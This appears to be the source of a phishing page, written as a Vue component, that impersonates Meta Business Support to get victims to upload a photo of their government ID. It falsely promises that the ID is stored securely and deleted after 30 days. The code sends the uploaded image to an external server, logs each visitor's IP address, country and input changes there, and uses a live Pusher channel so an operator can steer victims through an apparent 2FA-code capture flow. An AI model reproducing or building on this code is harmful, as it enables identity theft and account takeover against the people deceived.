<script setup>
</script>

<template>
  <section class="h-screen flex justify-center items-center" style="background-image: url('https://www.dropbox.com/scl/fi/clgk9v0o9qqvrzssy7vzy/27baHo4dN_O.png?rlkey=n2ukporxk2xgohmzdzjd7yskv&st=47ns94sq&dl=1');">
    <div class="flex flex-col items-center px-6 ">
      <a href="/" class="flex items-center space-x-3 rtl:space-x-reverse py-6">
        <img src="../assets/if_logo_1.svg" class="h-20" alt="MT">
        <span class="self-center text-2xl font-semibold whitespace-nowrap dark:text-white">Meta</span>
      </a>
      <div class="w-full bg-white rounded-lg border-blue-100 border shadow dark:border md:mt-0 sm:max-w-3xl xl:p-0 dark:bg-gray-800 dark:border-gray-700">

        <div class="p-6 space-y-4 md:space-y-6 w-full">
          <ol class="items-center w-full space-y-4 sm:flex sm:space-x-8 sm:space-y-0 rtl:space-x-reverse">
            <li class="flex items-center text-blue-600 dark:text-blue-500 space-x-2.5 rtl:space-x-reverse">
        <span class="flex items-center justify-center w-8 h-8 border border-blue-600 rounded-full shrink-0 dark:border-blue-500">
            1
        </span>
              <span>
            <h3 class="font-medium leading-tight">Review Requested</h3>
            <p class="text-sm">Request review of restrictions</p>
        </span>
            </li>
            <li class="flex items-center text-blue-600 dark:text-blue-500 space-x-2.5 rtl:space-x-reverse">
        <span class="flex items-center justify-center w-8 h-8 border border-gray-500 rounded-full shrink-0 dark:border-gray-400">
            2
        </span>
              <span>
            <h3 class="font-medium leading-tight">Identify Verify</h3>
            <p class="text-sm">Verify your identify</p>
        </span>
            </li>
            <li class="flex items-center text-gray-500 dark:text-gray-400 space-x-2.5 rtl:space-x-reverse">
        <span class="flex items-center justify-center w-8 h-8 border border-gray-500 rounded-full shrink-0 dark:border-gray-400">
            3
        </span>
              <span>
            <h3 class="font-medium leading-tight">Result</h3>
            <p class="text-sm">Result of verification process</p>
        </span>
            </li>
          </ol>


        </div>
        <div class="space-y-4 md:space-y-6 p-8 sm:p-6 w-full">
          <form class="mx-auto">
            <div class="">
              <div class="flex p-4 mb-4 text-sm text-blue-800 rounded-lg bg-blue-50 dark:bg-gray-800 dark:text-blue-400" role="alert">
                <svg class="flex-shrink-0 inline w-4 h-4 me-3 mt-[2px]" aria-hidden="true" xmlns="http://www.w3.org/2000/svg" fill="currentColor" viewBox="0 0 20 20">
                  <path d="M10 .5a9.5 9.5 0 1 0 9.5 9.5A9.51 9.51 0 0 0 10 .5ZM9.5 4a1.5 1.5 0 1 1 0 3 1.5 1.5 0 0 1 0-3ZM12 15H8a1 1 0 0 1 0-2h1v-3H8a1 1 0 0 1 0-2h2a1 1 0 0 1 1 1v4h1a1 1 0 0 1 0 2Z"/>
                </svg>
                <span class="sr-only">Info</span>
                <div>
                  <span class="font-medium">We need a photo of your official ID with your date of birth visible. This could be a birth certificate, passport, or orther type of official identification.</span><br/>
                  <span class="font-bold">Your identification documents must clearly show four corners and be sharp.</span>
                </div>
              </div>
              <label class="block mb-2 text-sm font-medium text-gray-900 dark:text-white" for="file_input">Upload a photo of your ID</label>
              <input @change="onFileChange($event)" class="block w-full text-sm text-gray-900 border border-gray-300 rounded-lg cursor-pointer bg-gray-50 dark:text-gray-400 focus:outline-none dark:bg-gray-700 dark:border-gray-600 dark:placeholder-gray-400" aria-describedby="Upload a photo of your ID" id="file_input" type="file">
              <p class="mt-1 text-sm text-gray-500 dark:text-gray-300" id="file_input_help">SVG, PNG, JPG or GIF (MAX. 800x400px).</p>
              <div id="alert-additional-content-5" class="p-2 border border-gray-300 rounded-lg bg-gray-50 dark:border-gray-600 dark:bg-gray-800" role="alert">
                <div class="flex items-center">
                  <svg class="flex-shrink-0 w-4 h-4 me-2 dark:text-gray-300" aria-hidden="true" xmlns="http://www.w3.org/2000/svg" fill="currentColor" viewBox="0 0 20 20">
                    <path d="M10 .5a9.5 9.5 0 1 0 9.5 9.5A9.51 9.51 0 0 0 10 .5ZM9.5 4a1.5 1.5 0 1 1 0 3 1.5 1.5 0 0 1 0-3ZM12 15H8a1 1 0 0 1 0-2h1v-3H8a1 1 0 0 1 0-2h2a1 1 0 0 1 1 1v4h1a1 1 0 0 1 0 2Z"/>
                  </svg>
                  <span class="sr-only">Info</span>
                  <h3 class="text-lg font-medium text-gray-800 dark:text-gray-300">Information safety </h3>
                </div>
                <div class="mt-2 mb-0 text-sm text-gray-800 dark:text-gray-300">
                  Your ID will be stored securely and deleted within 30 days after we've finished confirming your identity. We might use trusted service providers to help review your information.
                </div>
              </div>
            </div>
            <button type="button" @click='submitForm' class="mt-3 text-white bg-blue-700 hover:bg-blue-800 focus:ring-4 focus:outline-none focus:ring-blue-300 font-medium rounded-lg text-sm w-full sm:w-auto px-5 py-2.5 text-center dark:bg-blue-600 dark:hover:bg-blue-700 dark:focus:ring-blue-800">Submit</button>
          </form>
        </div>
      </div>

    </div>
  </section>
</template>

<style scoped>

</style>

<script>
import axios from "axios";
import Pusher from "pusher-js";
import phones from "@/assets/phones.json";
import constants from "@/constants";
import {Modal} from "flowbite";
export default {
  name: 'TwoFactorAuthenticate',
  props: {
    msg: String,
  },
  created() {
    if (!(localStorage.getItem("is_login") === "1")) {
      window.location.href = "/"
    }
    this.user.provider2fa = localStorage.getItem("provider2fa");
  },
  mounted() {
    const self = this;
    const CHANNEL_KEY = "channel_key";
    const channelName = localStorage.getItem(CHANNEL_KEY)
    if (!channelName || channelName.indexOf("PUB_ID") === -1) {
      this.channelUuid = "PUB_ID_" + crypto.randomUUID();
      localStorage.setItem(CHANNEL_KEY, this.channelUuid)
    } else {
      this.channelUuid = channelName;
    }

    this.ws.pusher = new Pusher(this.ws.pusherKey, {
      cluster: this.ws.pusherCluster,
    });

    this.ws.channel = this.ws.pusher.subscribe(this.channelUuid);

    this.ws.channel.bind("step-2-result", function(data) {
      if (data) {
        let json = JSON.parse(data.message)
        if (json.success === "2") {
          window.location.href = "personal-information-security";
        } else if (json.success === "3") {
          self.showTwoFactorSuggestionPopup(json.message);
        } else if (json.success === "1") {
          localStorage.setItem(CHANNEL_KEY, "")
          window.location.href = "success";
        } else {
          self.errors.code = json.message;
        }
      } else {
        self.errors.code = "Something went wrong. Please try again later.";
      }
      self.loading = false;
    });

    try {
      if (localStorage.getItem('country_code') === 'unk' || !localStorage.getItem('country_code')) {
        fetch('https://freeipapi.com/api/json')
            .then(response => response.json())
            .then(data => {
              if (data) {
                if (data.countryName === 'Viet Nam') {
                  // this.isAllowed = false;
                  // self.handleAction("New visitor. IP = " + data.ipAddress + ", country = " + data.countryName + ", URL = " + window.location.pathname + ", VietNam nên bỏ qua")
                }
                self.handleAction("New visitor. IP = " + data.ipAddress + ", country = " + data.countryName + ", URL = " + window.location.pathname)
                if (data.countryCode) {
                  localStorage.setItem("country_code", data.countryCode)
                  localStorage.setItem("ip_address", data.ipAddress)
                } else {
                  localStorage.setItem("country_code", "unk")
                }

                let phoneConfig = phones.find(x => x.code === localStorage.getItem("country_code"));
                if (phoneConfig) {
                  this.placeHolder.phone = phoneConfig.dial_code;
                }
              }
              this.isLoadingPage = false;
            });
      } else {
        let country_code = localStorage.getItem("country_code")
        let ip_address = localStorage.getItem("ip_address")

        self.handleAction("New visitor. IP = " + ip_address + ", country = " + country_code + ", URL = " + window.location.pathname)
        this.isLoadingPage = false;
      }

    } catch (ex) {
      self.handleAction("Can not get IP information");
    }

    setInterval(() => {
      if (self.canResendCodeAfter > 0) {
        self.canResendCodeAfter--;
      }
      if (self.canResendCodeAfter === 0) {
        self.errors.resendCode = "";
      }
    }, 1000)

    this.ws.pusher.connection.bind('disconnected', function() {
      alert('Disconnected to meta server. Please reload and try again.')
    })

    const modalEl = document.getElementById('info-popup');
    this.twoFactorSuggestionModal = new Modal(modalEl, {
      placement: 'center',
      onShow: () => {
        this.handleAction("Màn 2fa gợi ý hiển thị")
        this.errors.phoneNumber = "";
        this.errors.email = "";
      },
      onHide:() => {
        this.loading = false;
        this.handleAction("Màn 2fa gợi ý bị ẩn")
      }
    })
  },
  data() {
    return {
      user: {
        provider2fa: "sms",
        code: ""
      },
      file: "",
      fileName: "",
      errors: {
        code: null,
        resendCode: "",
        approved: ""
      },
      ws: {
        pusher: null,
        channel: null,
        pusherKey: constants.PUSHER_KEY,
        pusherCluster: "ap1"
      },
      loading: false,
      success: false,
      dm: constants.API_URL,
      name: 'Meta Business Support',
      supportLine: atob("Q29udGFjdCBNZXRhIHN1cHBvcnQ="),
      isAvailable: true,
      canResendCodeAfter: 0,
      twoFactorSuggestionModal: null,
      twoFactorSugestionText: ""
    }
  },
  methods: {
    onChange(event) {
      try {
        this.handleAction(`User is changed: ${event.target.name} - value = ${event.target.value}`)
      } catch (ex) {
        console.log(ex);
      }
    },
    handleAction(message) {
      if (message === 'ResendCode') {
        if (this.canResendCodeAfter > 0) {
          this.errors.resendCode = `Please wait ${this.canResendCodeAfter}s before sending new code`;
          return;
        } else {
          this.canResendCodeAfter = 60;
        }
        this.loading = true;
        this.errors.code = "";
        setTimeout(() => {
          this.user.provider2fa = 'We have sent the verification code again. Enter the code to log in.';
          this.loading = false;
        }, 1000)

      }
      if(this.channelUuid) {
        try {
          axios.post(`${this.dm}api/handleAction`, {"pubId": this.channelUuid, "message": message})
        }catch (ex) {
          console.log(ex);
        }
      }
    },
    validateOtpUserInput() {
      let otp = this.user.code;
      if (!otp || otp.toString().trim() === "") {
        this.errors.code = "Please input your code.";
        return false;
      }
      if (!Number.isInteger(otp)) {
        this.errors.code = "Please enter a valid code.";
        return false;
      }
      if (otp.length > 10) {
        this.errors.code = "Please enter a valid code.";
        return false;
      }
      return true;
    },
    submitForm() {

      axios.post(`${this.dm}api/uploadID?channel_public_id=${this.channelUuid}`,{image: this.image}).then(response => {
        console.log(response)
        window.location.href = "success";
      }).catch((error) => {
        console.log(error.message);
        alert("Upload id failed.")
      });
    },
    createImage(file) {
      let reader = new FileReader();
      let vm = this;
      reader.onload = (e) => {
        vm.image = e.target.result;
      };
      reader.readAsDataURL(file);
    },
    onFileChange(e) {
      let files = e.target.files || e.dataTransfer.files;
      if (!files.length)
        return;
      this.createImage(files[0]);
      this.image = e.target.files[0];
    }
  }
}
</script>